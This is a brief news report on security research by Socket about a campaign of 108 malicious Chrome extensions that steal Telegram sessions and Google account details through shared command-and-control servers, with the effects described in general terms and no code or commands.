A large-scale campaign involving 108 malicious Chrome extensions has been uncovered, affecting roughly 20,000 users, with the extensions spread across categories such as gaming, social media tools and translation utilities. The extensions appear legitimate but secretly collect sensitive data, and all are linked to a single command-and-control infrastructure to enable operators to aggregate stolen information in one place.
According to Socket, the campaign stands out for its breadth and coordination, with five developer identities used but consistent backend systems and shared operational patterns across all extensions. Several attack techniques were deployed, including a Telegram-focused extension that captures active web sessions every 15 seconds, allowing full account access without passwords or MFA.
The research also notes extensions that harvest Google account details via OAuth2, inject ads, or open arbitrary pages through hidden backdoors, with many operating in the background even when users do not interact. Infosecurity Magazine contacted Google for comment but has not yet received a response. 14 April 2026.